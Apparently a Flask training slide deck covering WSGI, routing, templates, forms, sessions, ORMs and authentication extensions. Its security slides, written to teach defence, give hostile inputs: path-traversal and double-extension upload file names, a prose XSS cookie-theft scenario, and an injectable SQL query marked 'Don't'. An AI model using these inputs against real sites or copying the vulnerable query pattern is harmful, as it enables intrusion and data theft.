Flask

title: Web development with Flask
author: Alexander Patrakov

Let's start from the basics ⌘

WSGI
Purpose of web frameworks
Available web frameworks
Place of Flask in the ecosystem

HTTP protocol ⌘

HTTP/1.1 is defined by RFC 7230 - RFC 7235
Browsers are the most popular clients
There are non-browser clients
Web servers deliver HTML, images, JS, CSS, downloadable files, other content types

HTTP Request ⌘

GET /html/rfc7240 HTTP/1.1
Host: tools.ietf.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,ru;q=0.6
Cookie: __cfduid=d105aee619396e6187d19c60cb032f4b71479467417

HTTP Response ⌘

HTTP/1.1 200 OK
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 13 Nov 2016 10:39:20 GMT
ETag: "3cc378-c260-5412c55f8017f;54191604efade"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Fri, 25 Nov 2016 11:15:54 GMT
Strict-Transport-Security: max-age=3600
Content-Length: 12952
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<other headers omitted for brevity>

<!DOCTYPE html ...

Python web applications ⌘

WSGI is the interface between the web server and the web application
- Defined in PEP 3333
The web server calls a callable for every request
- usually "application", but the name is configurable
It should take two parameters: environ and start_response
- environ is a dict with CGI-like parameters
  - also contains the "input" stream used for POST content
- start_response(status, response_headers, exc_info=None) is a callback
  - should be used by the application to set the response headers and status code
  - should return an iterable which supplies pieces of content
WSGI is not good for websockets!

Simplest Python web application ⌘

(use it with Apache's mod_wsgi, or run from command line)

#!/usr/bin/python2

from wsgiref.simple_server import make_server

def application(environ, start_response):
    status = '200 OK'
    output = 'Hello World!'

    response_headers = [('Content-type', 'text/plain'),
                        ('Content-Length', str(len(output)))]
    start_response(status, response_headers)

    return [output]

if __name__ == "__main__":
    httpd = make_server('', 8000, application)
    httpd.serve_forever()

Exercise: try the raw WSGI ⌘

Can you print the complete WSGI environment to the browser?
Can you handle two different URLs? ("Hello world" and environment)

Tasks of a web framework ⌘

Routing
Sessions
Response formatting
Input validation
Database communication
Structuring your application

Available web frameworks ⌘

Batteries included
- Self-contained and comprehensive
- Examples: Django, TurboGears, web2py
Best of breed
- Just a thin layer of glue between other libraries
- Examples: Flask, Pyramid, CherryPy, Bottle

Flask as compared to other web frameworks ⌘

Minimalistic
Commonly used for APIs and single-page applications
- Traditional web applications with forms are also possible
Non-MVC by default - does not supply the model layer
- But you can support MVC in your application
Modern and actively developed
Relies on established technologies via third-party libraries
Does not constrain the developer in terms of application architecture

Flask criticisms ⌘

You are the only architect of your application
- There is no scaffolding
- With great power comes great responsibility
Many extensions of varying quality and fitness for your purpose
- Sometimes it is easier to code the necessary functionality from scratch
Sad story about user authentication

Installation ⌘

Flask is best installed into a virtualenv

virtualenv3 flask-env
cd flask-env
. bin/activate
pip install flask

Also included as a package in Debian and Ubuntu
- Likely outdated, but still works
- Not recommended unless you absolutely need something that never changes
Flask supports both Python2 and Python3

Flask is a glue ⌘

Glues together:
- Werkzeug for HTTP request and response abstractions, as well as interactive debugger
- Jinja2 for templating system
- Itsdangerous for secure cookies (used for sessions)
Provides:
- Structuring your application into a set of blueprints
- URL routing for blueprints
- Error handling
- Configuration system

Hello World ⌘

Save as app.py
FLASK_APP=app.py flask run

from flask import Flask

application = Flask(__name__)

@application.route('/')
def index():
    return u'Hello, World!'

Return value of a view function ⌘

Any of the following:
- A ready-made flask.Response object
  - Use make_response to create it, and then you can post-process it
- Unicode string
  - Will be converted to UTF-8 and served as text/html
- Byte string
  - Will be served as text/html
- A tuple of (response, status, headers) or (response, headers)

More routing ⌘

View functions can take arguments extracted from the URL path
Example:

@app.route('/news/<slug>')
def news(slug):
    pass  # slug is a string that must not contain slashes

It is also possible to convert some types like int:

@app.route('/user/<int:userid>')
def show_user(userid):
    pass  # userid is an integer

Acceptable converters ⌘

General syntax: <type(args):variable_name>
string, int, float, uuid: do the obvious thing
string is just the default converter
UUIDs stay as strings, but now you can be sure they are valid
path: string that can contain slashes
any(foo,bar.baz): accepts only foo, bar or baz
See Werkzeug documentation for all acceptable parameters

About trailing slashes ⌘

By default, if you include a trailing slash in your route, Flask will generate a redirect if it sees the same URL without a slash
To turn off:

app = Flask(__name__)
app.url_map.strict_slashes = False

Flask extensions ⌘

Extensions add support for common tasks (like connecting to a database)
Good question: why do we need an extension?
Answer: boilerplate code that is reduced. E.g. connecting to the database at the beginning of each request.
Here is an example how to use:

from flask import Flask
from flask_peewee.db import Database

# General pattern:
# 1. Create app
app = Flask(__name__)
# 2. Add configuration specific to the extension
app.config['DATABASE'] = {
    'name': 'example.db',
    'engine': 'peewee.SqliteDatabase',
}
# 3. Instantiate the extension, passing app as a parameter
db = Database(app)

Common extensions ⌘

Internationalization: Flask-BabelEx
Dealing with file uploads: Flask-Uploads
Processing forms: Flask-WTF
Interfacing with databases: Flask-SQLAlchemy and Flask-Peewee
Creating REST-like APIs: Flask-RESTful (general case), Flask-Restless (for SQLAlchemy-managed database records)
Enough for now

Do we need an extension to use something? ⌘

Good question!
Case study: Flask-WTF
WTForms are framework-neutral
Flask-WTF connects Flask-specific Request class to WTForms
so WTForms can get the data from there automatically
Same for file uploads
Case study: Flask-Peewee
Written by the same author as the Peewee ORM itself
The Peewee page documents the recommended way to use Peewee from Flask
Without the extension!
All you need is to connect to the database at the beginning of the request and disconnect at the end
The extension includes some extra functionality, but this extra functionality is deprecated

Templates ⌘

Templates are incomplete HTML pages, which require post-processing
values have to be inserted
pieces such as table rows have to be repeated
some parts may be displayed conditionally
there is a hierarchy of inheritance
Templates live in the templates directory

Rendering templates ⌘

At the top of the file: from flask import render_template
In the view function: flask.render_template(template_name_or_list, **context)
context provides extra variables for the template to use
request, g, session and app.config (as config) are always available

Template syntax ⌘

Jinja2 is the underlying engine
Write whatever HTML code that is needed - it will be delivered to the browser
To display a variable, write {{ variable }}
attribute access and array element access also works
some functions (e.g. url_for) are also available
Conditional printing: {% if foo %} ... {% else %} ... {% endif %}
Looping: {% for a in b %} ... {{ a }} ... {% endfor %}
There are macros
Equivalent of functions in other languages

Macros ⌘

Best explained via example from Flask-Security
In _macros.html:

{% macro render_field_with_errors(field) %}
  <p>
    {{ field.label }} {{ field(**kwargs)|safe }}
    {% if field.errors %}
      <ul>
      {% for error in field.errors %}
        <li>{{ error }}</li>
      {% endfor %}
      </ul>
    {% endif %}
  </p>
{% endmacro %}

In other templates:

{% from "security/_macros.html" import render_field_with_errors %}
{{ render_field_with_errors(login_user_form.email) }}
{{ render_field_with_errors(login_user_form.password) }}
{{ render_field_with_errors(login_user_form.remember) }}

XSS attacks ⌘

XSS = Cross-Site Scripting
Interpretation of malicious data as HTML (or, worse, JavaScript) by the browser
Reflected XSS: data from the query string are interpreted as HTML
Stored XSS: data from the database are interpreted as HTML
Typical exploitation scenario: write a "blog post" that also sends document.cookie to attacker when viewed by admin
Admin's session is now hijacked!
Solution: convert data from text to HTML
Also known as "escaping"

CSRF attacks ⌘

CSRF = Cross-Site Request Forgery
A hacker makes a form on his website
The button says "View my photos"
The form actually submits to your bank (in hope that you are logged in) and asks it to transfer $100 to the hacker
WTForms protect you against CSRF
They include a hidden field in all forms and check it against a cookie
The hacker can't see or modify the cookie, so can't guess what should be in the hidden field
Don't forget to render the CSRF protection field: {{ form.hidden_tag() }}

How variables are escaped ⌘

Autoescape is on for all templates with .html, .htm, .xml and .xhtml extensions
With autoescape:
If it is an object with an __html__ attribute, then this attribute is called as a function, and the result is used as-is
Otherwise, the object is converted to unicode and then the result is escaped
The logic is in the markupsafe.escape function
If you already have a piece of HTML in a string, make a Markup object from it and print it
Use unicode for text (that needs escaping) and Markup for HTML fragments (that don't need escaping)
Alternatively, use this inside the template: {{ something|safe }}
Without autoescape, all variables are simply converted to unicode

How to format objects for JavaScript ⌘

var myobj = {{ mydict }}; won't work
Reason: you want to transform to JSON, not to string with HTML escaping
This pattern works:

<script><!--
var myobj = {{ mydict|tojson }};
--></script>

With Flask before 0.10, you also needed to add |safe at the endHow to provide some variables to all templates ⌘

Common use cases: user name, cart item count, ...
They are usually displayed in the navigation bar and thus should be always available
Solution: write a context processor

@app.context_processor
def inject_user():
    return dict(user=current_user)

Template inheritance ⌘

You definitely don't want to write the whole HTML for every dynamic page
There are too many common parts, e.g. the general theme
Solution: create a base template and extend it
In the base template, mark the replaceable parts with {% block foo %}...{% endblock foo %}
The block tag both denotes a "pluggable hole" and the default content there
Child templates can override the content
Sometimes it is a good idea to create blocks both inside and outside certain HTML tags
So that you can either fill in the tag with the relevant content, or remove it completely
At the top of the child template, put {% extends "base.html" %}
Then, write the overrides for some blocks: {% block foo %}...{% endblock foo %}
{{ super() }} inside the overridden block gets back the default content

Static files ⌘

Images, javascript and css files, fonts, ...
Not processed by Python
Put them into the static folder
Flask will serve them from the /static URL
But you should really configure your web server to do that instead
And please don't hard-code /static in URLs
Please use url_for('static', filename='...') instead

Good starting points ⌘

Minimal:
Almost nothing: HTML5 Boilerplate
With a bit of responsive theming: Initializr
Popular:
Does not need any introduction: Bootstrap
There is a Flask-Bootstrap extension that contains some handy functions
The most advanced responsive CSS framework: Foundation
This thing evolves very fast, beware!

What about static content like help pages? ⌘

Help pages cannot be static files
Navigation bar still contains dynamic content
Still, a simple solution for them all is wanted
What you probably want is the Flask-FlatPages extension
Serves flat pages from Markdown-based static files
The extension itself only returns a rendered piece of HTML for static content, it's your task to put it into a proper template
It's a good idea to use a catch-all route, to be added last

@app.route('/<path:path>/')
def page(path):
    page = pages.get_or_404(path)
    template = page.meta.get('template', 'flatpage.html')
    return render_template(template, page=page)

In a template, you can also access things like page.title, to be fetched from the YAML block at the top of the fileReturning JSON ⌘Use the jsonify helper

from flask import jsonify

# in a view:
    return jsonify(some_object)

The helper in this case sets the correct MIME type (application/json)Returning redirects ⌘

from flask import redirect

# in a view:
    return redirect(some_url)

Returning custom headers and error pages ⌘

You can return a Response object from your view
Make it with make_response()
Set response.headers['...'], mimetype and/or status_code
Altervatively, return a tuple of response_string, status, headers from a view function
Or even response_string, status_or_headers and Flask will guess what you mean
To return a pre-designed HTTP error page (e.g. a 404): abort(404)
To customize the 404 page:

from flask import render_template

@app.errorhandler(404)
def page_not_found(e):
    return render_template('404.html'), 404

Application context ⌘

WSGI interface is composable, so there may be more than one app
This is an advanced use case, we will not do that
Anyway, in a particular thread at a given moment, at most one is active
It is sometimes too cumbersome to pass the application everywhere
Solution: use the current_app context-local variable
It does not work if no application is active
with app.app_context(): current_app.do_something()
Pushes the application context down the stack, does something, then removes from the stack
This is only a problem that manifests itself in code outside view functions

Request context ⌘

Same story: due to internal redirects, there may be more than one request
This is also an advanced use case
Anyway, in a particular thread at a given moment, at most one request is active
Flask keeps the current request in the request context-local variable
It is sometimes useful to create a test request and push it down the stack

What's in the request object ⌘

method: the HTTP method, e.g. "GET" or "POST"
args: stuff after the question mark in the URL, parsed into something like a dictionary
form: same for POST variables (multipart/form-data)
These two are also combined into values
files: files uploaded via the form
cookies: incoming cookies
headers: HTTP headers
get_json(): here is how to convert the incoming application/json data into Python objects

On duplicate parameters: MultiDict ⌘

http://example.com/something?i=1&foo=bar&foo=baz

This is valid
request.args['foo'] takes the first value, i.e. bar
To get them all as a list, use request.args.getlist('foo')
No foo? Get an empty list
request.args['does_not_exist'] still raises a KeyError
A nice feature is that you can do type conversions like this: request.args.get('i', type=int)
A default value can also be passed

Validating requests ⌘

Of course it is possible to validate request.form or request.args by hand
A better alternative is to use a form validation library
Common choice: WTForms, via the Flask-WTF extension
Tasks simplified by WTForms:
Conversion between strings and native data types, both ways
E.g. sometimes you need to display something in a form for editing
Display of common HTML5 input-like tags
Arbitrary per-field or whole-form validation
Displaying useful error messages near the invalid field

Flask-WTF boilerplate ⌘

from flask_wtf import FlaskForm
from wtforms.fields import *
from wtforms.validators import *

# Some people prefer this:
# from flask_wtf import FlaskForm as BaseForm

# Then use FlaskForm (or BaseForm) as a base class for your forms, e.g.:

class MessageForm(FlaskForm):
    recipients = StringField('Recipients',
                             validators=[InputRequired(message='No recipients provided')])
    message = TextAreaField('Your message',
                             validators=[InputRequired(message='Message cannot be empty')])
    submit = SubmitField('Submit')

WTForms field types ⌘

Obvious: StringField, IntegerField, FloatField (rarely used), DecimalField
These render as <input type="text">
On form submission, they coerce the string into the correct type
Special rendering but nothing else: HiddenField, PasswordField, TextAreaField
Choice-related: SelectField, RadioField, SelectMultipleField
They accept the choice=... keyword argument, and render as the corresponding HTML5 tags
There are also FileField, DateField, DateTimeField, SubmitField, and others
You can create custom fields, too
Out of scope for this training

Typical structure of a view with a form ⌘Typical usage pattern with Flask-WTF:

@app.route('/submit', methods=('GET', 'POST'))
def submit():
    form = MyForm()
    if form.validate_on_submit():
        do_something()
        return redirect('/success')
    return render_template('submit.html', form=form)

The validate_on_submit method comes from Flask-WTF, not wtforms!
If you need to pass form data from sources other than request.form
Pass the dictionary as an argument to form.validate
Maybe disable CSRF validation via keyword argument: meta={'csrf': False}
If you want to edit some ORM object, pass it as obj keyword parameter to the form constructor
It will be checked for matching attributes if there is nothing POSTed

How WTForms validates the form ⌘

It calls all field validators until one raises StopValidation
This includes validators passed during field construction, and the validate_fieldname() method on the form
If you need form-level validation, override the validate method
The real question without a good answer is where to put the resulting errors

How to get the data and errors from the form ⌘

Many ways to access validated data:
form.my_field.data - None if there were errors
form.data - expensive, generated each time you access it
form.populate_obj(some_object) - may be useful with ORMs
And get errors:
form.my_field.errors - this is a list of messages
form.errors - this is a dictionary which contains only fields with errors (name => list of messages)

WTForms built-in validators ⌘

All validators take a message as their first argument
Optional: put it first if an empty field should not be checked by other validators
InputRequired: fails if the user entered nothing
DataRequired: fails if the user did not enter anything that can be coerced into a truthy value of the target type
Almost never useful - bans 0, 0.0 and similar values for integer and decimal fields
Length, NumberRange
Regexp, Email, URL
AnyOf, NoneOf
There are others
You can create custom validators
Look at the source, create classes in the same way, raise ValidationError when needed

How to display form fields ⌘

Just mention them like this: {{ form.myfield }}
Or, call them to set additional HTML attributes: {{ form.myfield(class_="fancy") }}
There is also a pre-made label for each field: {{ form.myfield.label }}
This is for the use case when the label is near the field's input tag
The other possibility offered by the HTML standard is to make the input a subelement of the label
WTForms doesn't do this, but you can hand-code it
You should be able to display errors based on form.myfield.errors
The form itself does not have an __html__ method
But you can iterate over it to get the fields
Don't forget {{ form.hidden_tag() }} (comes from Flask-WTF, for CSRF protection)

Dealing with file uploads ⌘

Werkzeug has request.files which is a MultiDict of FileStorage objects
You can use it directly
Useful properties: filename, content_type, content_length
You can call a save method to save it to a file
Or you can access it via the stream property (either in-memory representation or a temporary file
WTForms don't handle file uploads
Flask-WTF has FileField
form.my_file_field.data reefers to Werkzeug's FileStorage

File upload security ⌘

Hackers can provide any filename
Including ../../../../../tmp/hacked.txt!
Or evil.jpg.php
Be careful
Whitelist allowed mime types and extensions
Check filenames
werkzeug.utils.secure_filename strips out the bad stuff but can return an empty or non-unique filename
Always rename the uploaded file to something safe and unique
Limit the maximum file size
The Flask-Upload extension can help you with these tasks
It also supports serving uploaded files

Configuration system ⌘

app.config looks like a dictionary
You can also update it from various sources
app.config.from_object
Imports the module provided as an argument, takes everything that has all-upsrcase names
app.config.from_envvar
Loads the file with the name provided by the argument
it should contain lines like DEBUG = False

Mandatory configuration ⌘

SECRET_KEY = 'some long string that nobody can guess'
Used for secure cookies in sessions

Handling non-GET requests ⌘

By default, @app.route(...) registers only the handler for GET requests
Add the methods=("GET", "POST") keyword argument to override the default
GET implies HEAD
OPTIONS is always implied and, if necessary, routed to the internal handler

Session ⌘

A way to store some data between requests made by the same client
Just use flask.session as a dict that can only hold serializable values
Flask session is, by default, based on signed cookies
Cookies are signed using the secret key, so keep it non-guessable
Limitations:
You cannot store secrets there (a client can do URL-safe base64 decoding and gzip decompression to get the data)
You cannot store too much data

Flashing messages ⌘

Flashing a message means storing it at the end of the request so that it can be displayed at the next request
Here is how to flash a message:

from flask import flash

...
# in a view function
flash('A message', 'error')

To get flashed messages, use the get_flashed_messages() function in a template. Something like this:

{% with messages = get_flashed_messages(with_categories=True) %}
  {% if messages %}
    <ul class=flashes>
    {% for category, message in messages %}
      <li class="{{ category }}">{{ message }}</li>
    {% endfor %}
    </ul>
  {% endif %}
{% endwith %}

The names of message severities do not match those used by Bootstrap
Flask-Bootstrap contains an utility to display them, too:

{% import "bootstrap/utils.html" as utils %}
{% with messages = get_flashed_messages(with_categories=True) %}
  {% if messages %}
    <div class="row">
      <div class="col-md-12">
        {{ utils.flashed_messages(messages) }}
      </div>
    </div>
  {% endif %}
{% endwith %}

How to structure a Flask application ⌘

Ugly and fragile circular imports are a common issue
The official documentation dismisses them as something acceptable, but in fact they are avoidable
In app.py, create the application and populate its config
Do nothing else
In models.py, initialize the ORM-related extension and describe models
You will need to import app, or use init_app() later
If you want to use Flask-Admin for the administrative interface, do everything related in admin.py
You will need to import app and all models
In forms.py, describe the forms
A common way to do so is to use wtforms via Flask-WTF
As with any Flask extension, you need to import the app or use init_app() later
Some forms will be based on models, so you need to import them
In other files, do other things needed by your application
Collect everything in main.py, initialize all extensions
And then point "flask run" to it

Signals ⌘

Signals are a way to decouple policy from mechanism
Policy: what should be done when a user registers?
Mechanism: what does it mean that the user registered?
Signals are available when the blinker library is installed

import blinker
signals = blinker.Namespace()
user_registered = signals.signal("user-registered")

How to emit:

    user_registered.send(app._get_current_object(),
                         user=user, confirm_token=token)

How to subscribe:

def my_callback(sender, user, confirm_token, **extra):
    pass

user_registered.connect(my_callback)

Flask has some built-in signals like template_rendered, request_started
They are useful for profiling and tracing

Decorator-based hooks ⌘

Flask has an ability to register functions that run at certain stages of request processing
Unlike signals, they can modify the request or response, or even prevent the normal view function from running
See after_request(), before_first_request(), before_request(), errorhandler(), teardown_appcontext(), teardown_request()

Blueprints ⌘

Logical parts of the app
Can contain view functions, templates, static files
If you think "let's convert my views.py file into a package", better think about blueprints

from flask import Blueprint

bp = Blueprint('captcha', __name__)  # and possibly other keyword arguments

# Then use it like an app. E.g.:
@bp.route('/captcha.jpg')
def captcha():
    pass

# Any setup code goes here
def bp_setup(state):
    app = state.app
    blueprint = state.blueprint
    # ...

bp.record_once(bp_setup)

You have to register your blueprints on an app

from captcha import bp as captcha_bp

app.register_blueprint(captcha_bp)

MVC ⌘

Model, View, Controller
A common pattern for application design
Or maybe just a buzzword that only indicates that Models, Views and Controllers exist, with some separation of concerns
Flask is not an MVC framework, but your application can still be based on this pattern
Wikipedia's articles on MVC, MVP (Model, View, Presenter) and similar software architectures are written with classical GUI-based software in mind
The English Wikipedia MVC interaction diagram (below) doesn't apply to web frameworks
Non-English editions of Wikipedia even have different interaction diagrams!

MVC in web frameworks: Model ⌘

Model:
Has business-domain knowledge (both logic and data)
Provides API that can be used by the controller to read state and submit updates
Does not contain presentation logic
Note: in many other ORMs and web frameworks, a model is only an abstraction over data storage (such as database) and validation mechanism. I.e. there is no accent on the API that makes sense in the business problem domain.
Good article on the issue, by Julien Pauli
Even the data you get from web services can be expressed as a Model!
With Flask, the model layer is to be supplied by you, the developer
You can base it on SQLAlchemy for data persistence

MVC in web frameworks: View ⌘

View:
Presents data to the user
Usually as HTML
Data can come from the model and from the controller
Templates!

MVC in web frameworks: Controller ⌘

Controller:
Reacts to user actions (in the form of HTTP requests)
Decides what to do
Updates model state, or queries state from the model
Asks the appropriate view to render itself, supplies the necessary data
Frequently advocated approach: fat models, skinny controllers
StackOverflow discussion
View functions!

Database topics ⌘

Making SQL queries from Python
Ways to avoid SQL injection
SQLAlchemy vs Peewee
Defining tables
Selecting data
Joins
Inserting, updating and deleting data
Transactions

Making SQL queries from Python ⌘

DB API 2.0 specification
A standard which database-interfacing modules follow
You can connect to the database, issue queries, get results
There is a mechanism for using prepared queries and substitution of parameters

import sqlite3
db = sqlite3.connect('test.sqlite')
cur = db.cursor()
cur.execute('SELECT id, dname FROM dept WHERE loc = ?', ('Berlin',))
rows = list(cur)
db.commit()

SQL injection ⌘

A serious vulnerability
Appears when an application constructs SQL query dynamically by concatenating fixed strings with attacker-provided data
By using special characters (like ') inside their data, attacker can trick SQL database to interpret their data as additional SQL queries
Can bypass access restrictions, exfiltrate data, make unauthorized changes

How to avoid SQL injection ⌘

Answer from 1990s: forbid bad characters in user input
Bad: how would you register Catherine Anne O'Hara as a user?
Answer from 2000s: "escape" user data before concatenation so that special characters are properly interpreted as data, not as SQL syntax
Bad: too hard to keep track what's escaped and what's not
Too easy to forget to escape data
Answer from 2010s: don't build queries by concatenating fixed strings with user-provided data
"Prepared Statement" APIs exist that clearly separate SQL from external data in queries
Usually (but not always), they stay separate on the wire. If the database doesn't provide this option, the client library will escape and concatenate strings as necessary.

How to avoid SQL injection, once again ⌘

Don't:

cur.execute("SELECT id, dname FROM dept WHERE loc = '%s'" % (city,))

Do:

cur.execute('SELECT id, dname FROM dept WHERE loc = ?', (city,))

Or just let your favorite ORM generate queries for you.

Why we need ORMs ⌘

SQLite on dev, PostgreSQL in production
Slight differences in SQL syntax
E.g. here is how to create a suitable id field in SQL:
SQLite: id INTEGER PRIMARY KEY (autoincrement is optional, and the AUTOINCREMENT keyword, if present, must be placed last)
MySQL: id INTEGER AUTO_INCREMENT PRIMARY KEY
PostgreSQL: id SERIAL PRIMARY KEY
Construct queries programmatically
Important if a user should be able to e.g. filter or sort records on ultiple criteria
"IN" queries are just cumbersome with raw DB API
Access result rows in object-oriented way
There is an impedance mismatch between object-oriented and relational world
Conversion is trivial for integers and strings, but not for relations

Relations ⌘

1:1: don't do this, just put both sides into the same table
If you must (because of physical storage considerations), just use the same primary key and write helpers or joins to retrieve the other side
1:many: add a non-NULL reference field to the "many" side that references the "1" side
ORM will convert this into a maybe-lazily-loaded collection on "1:" side and to the link to the other object on the ":many" side
1:0-1: add a non-NULL unique reference field to the "0-1" side that references the "1" side
many:many: use an intermediate table that has two non-NULL fields that reference both sides
ORM will represent the other side as a collection

Normalization ⌘

Goal: make sure that the very structure of the database makes it impossible to have inconsistent data
If you don't update your data, denormalization may be OK
Traditional theory of relational databases doesn't really accept IDs
Always think "if there is no ID, what else could serve as a key?"
Useful rule of thumb, approximately equivalent to BCNF (also known as 3.5NF):
Each attribute must provide a fact about the key (1NF), the whole key (2NF), and nothing but the key (BCNF).
Both 2NF and 3NF are concerned equally with all candidate keys of a table and not just any one key.
So help me Codd!

Common ORMS ⌘

SQLAlchemy: the most powerful one
Adopts the Unit of Work pattern
The application sometimes becomes a bit too verbose
Peewee: the lightweight one
Adopts the Active Record pattern
Much easier to learn, but has limitations
There are others but they are not commonly used with Flask

How to learn an ORM ⌘

Describing tables
Migration tools
Selecting by primary key
Selecting by other attributes
Joining tables
Inserting, updating and deleting records
Mass updates and deletes
Data validation
Transactions

Flask-SQLAlchemy: boilerplate ⌘

from flask import Flask
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)

# Now use db.Model as a base class for your models
# also db.* contains everything from sqlalchemy and sqlalchemy.orm

How to describe database tables with SQLAlchemy ⌘

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    # ...

class Article(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    text = db.Column(db.Text)
    date = db.Column(db.DateTime)
    author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    author = db.relationship('User', backref='articles')

SQLAlchemy session ⌘

With SQLAlchemy, you need to construct relationships between objects by setting the attributes that were declared as db.relationship, not by manipulating IDs
The objects stay in the session (db.session)
Newly constructed objects have to be added there first
When you flush the session, the objects are saved to the database and get the IDs
Other database clients will see your records when you commit the transaction
flush != commit. Session flushing and transactions are different concepts

>>> db.create_all()
>>> u = User()
>>> u.id
>>> a = Article()
>>> a.text = 'Something new'
>>> a.author = u
>>> db.session.add(u)
>>> db.session.add(a)
>>> db.session.flush()
>>> u.id
1
>>> a.id
1
>>> a.author_id
1
>>> db.session.commit()

Querying the database ⌘

>>> # get by id
>>> a = Article.query.get(1)
>>> a.text
'Something new'
>>> # get by something else - note the first() to get only one item instead of a collection
>>> b = Article.query.filter(Article.date == None).first()
>>> b.id
1

Performing joins ⌘Here is how:

Article.query.join(User).filter(...)

The result is still a collection of Articles
The benefit is that you can filter on User-related conditions
SQLAlchemy will figure out the join condition automatically in most cases

Aggregation ⌘

Counting records: Article.query.filter(...).count()
Getting min, max, sum, ...:

from sqlalchemy.sql import func
db.session.query(func.max(Article.date)).filter(...).scalar()

There are special constructions for grouping, too
It is hard to come up with a query that cannot be expressed using SQLAlchemy
But this is not a course on SQLAlchemy, so please learn these advanced topics yourself when needed

Updating and deleting records ⌘

If you have the record:
db.session.delete(record) (or update fields as needed) and then db.session.flush()
If you want mass-update or mass-delete:
Article.query.filter(...).delete() or .update(...)
This bypasses the session, use with care

Peewee ORM: boilerplate with Flask-Peewee ⌘

from flask import Flask
from flask_peewee.db import Database

app = Flask(__name__)

app.config['DATABASE'] = {
    'name': '/tmp/test.db',
    'engine': 'peewee.SqliteDatabase',
}

db = Database(app)

# Now use db.Model as a base class for your models

Peewee ORM: raw boilerplate ⌘

from flask import Flask
from peewee import *

app = Flask(__name__)
database = SqliteDatabase('/tmp/test.db')

# This hook ensures that a connection is opened to handle any queries
# generated by the request.
@app.before_request
def _db_connect():
    database.connect()

# This hook ensures that the connection is closed when we've finished
# processing the request.
@app.teardown_request
def _db_close(exc):
    if not database.is_closed():
        database.close()

# A common pattern is to create a base model class
# so that all models know that they belong to this database
class BaseModel(Model):
    class Meta:
        database = database

How to describe database tables with Peewee ⌘

class User(db.Model):
    # With Peewee, id is implicit
    ...
    pass

class Article(db.Model):
    text = TextField()
    date = DateTimeField(default=datetime.datetime.now)
    # Note: you don't have to describe the column and the relationship separately
    author = ForeignKeyField(User, related_name='articles')

Active Record pattern ⌘

Peewee does not use Unit of Work and does not have a Session
Instead, each model object knows (via Meta) which database it belongs to
To persist it, call .save() on it
Unlike SQLAlchemy, you have to track dependencies manually
By default, an INSERT will be generated if the id is not set, and an UPDATE if id is known
To delete it, call .delete_instance() on it
Don't confuse with .delete which constructs a query which deletes all records matching a condition from the table!
By default, autocommit is True

Querying the database ⌘

>>> # get by id
>>> a = Article.get(id=1)
>>> a.text
'Something new'
>>> # get by something else - note the first() to get only one item instead of a collection
>>> b = Article.select().where(Article.date == None).first()
>>> b.id
1

Joins ⌘

With Peewee, joins are as easy as with SQLAlchemy
And they work exactly the same

Article.select().join(User).where(...)

Aggregation ⌘

Counting records: User.select().count()
Finding minimum or maximum: Article.select(fn.max(Article.date)).where(...).scalar()

Database evolution ⌘

It's a fact that fields and tables are added, removed, or otherwise modified
One can talk about schema migrations and data migrations
You can do it by hand, or by a script (i.e. create a migration)
SQLAlchemy: no built-in support for migrations
Frequently used with Alembic, maybe via Flask-Migrate
Schema migrations are auto-generated, but can be edited
Data migrations are possible but only documented in external blogs
Alternative: SQLAlchemy-migrate
Used e.g. in OpenStack
No Flask extension
Peewee: some built-in schema migrations but no built-in tracking of what has been applied
No clear winner among tracker tools
peewee-db-evolve is an interesting idea: fully automated schema migrations that introspect the current schema and diff it against the models
No Flask extension, and extension is not needed
Migration tools don't really work with SQLite due to incomplete support for ALTER TABLE

Model-based forms ⌘

Sometimes it is a good idea to base a form on a set of fields from a model, plus or minus some exceptions
The most secure practice is to whitelist fields
For SQLAlchemy models, use WTForms-Alchemy

from wtforms_alchemy import ModelForm
from myproject.myapp.models import User

class UserForm(ModelForm):
    class Meta:
        model = User
        only = ['first_name', 'last_name', 'email']

Peewee support is provided via the wtfpeewee package

from wtfpeewee.orm import model_form
from myproject.myapp.models import User
UserForm = model_form(User, only=('first_name', 'last_name', 'email'))

Admin interface ⌘

Smart idea: create a model_form from each model, and expose via dynamically-generated views
That's what Flask-Admin does
It also has a component for managing files on disk
It's your responsibility to properly restrict access to the admin interface
Boilerplate (without any security):

from flask import Flask
from flask_admin import Admin

from flask_admin.contrib.sqla import ModelView
# or: from flask_admin.contrib.peewee import ModelView

app = Flask(__name__)

admin = Admin(app)

admin.add_view(ModelView(User, db.session))
admin.add_view(ModelView(Article, db.session))
# Peewee: there is no session

For authentication, subclass ModelView and define the is_accessible method which should return a booleanSecurity-related extensions ⌘

Flask-Login
The most basic one
Tracks the currently logged-in user, stores it in the session
Allows to protect some views with the @login_required decorator
You have to implement the login procedure (e.g. the password check against your models) yourself
It's not that difficult, and the result is likely to match your business requirements
Flask-Security
Implements login, registration, password change, password recovery via email
In a way that may or may not be suitable for you - but allows some customization
Follows best practice regarding password storage
Supports both SQLAlchemy and Peewee
Flask-User
Was written because the author had found Flask-Security too difficult to customize
Supports only SQLAlchemy out of the box
There are also packages for the use case where the authentication data is not stored in models
Flask-SimpleLDAP, Flask-LDAP-Login, Flask-CAS, Flask-Social, ...

What's wrong with Flask-Security ⌘

User enumeration vulnerability open since 2015
Insists too much on users having emails
Possible, but non-trivial, to overcome
Implements a policy of sending emails on events like password change
This is configurable via app.config, with the default being on
It would have been better if Flask-Security just provided a signal that it triggers on such events
Possibly implements something else that doesn't match your requirements
Test it thoroughly

How to protect the entire application with login ⌘Look how the login_required decorator in Flask-login works to understand the code below

@app.before_request
def check_valid_login():
    login_valid = current_user.is_authenticated
    page_is_public = request.endpoint and request.endpoint in ('static', 'security.login')
    if not (login_valid or page_is_public):
        return current_app.login_manager.unauthorized()

Optimizing static assets ⌘

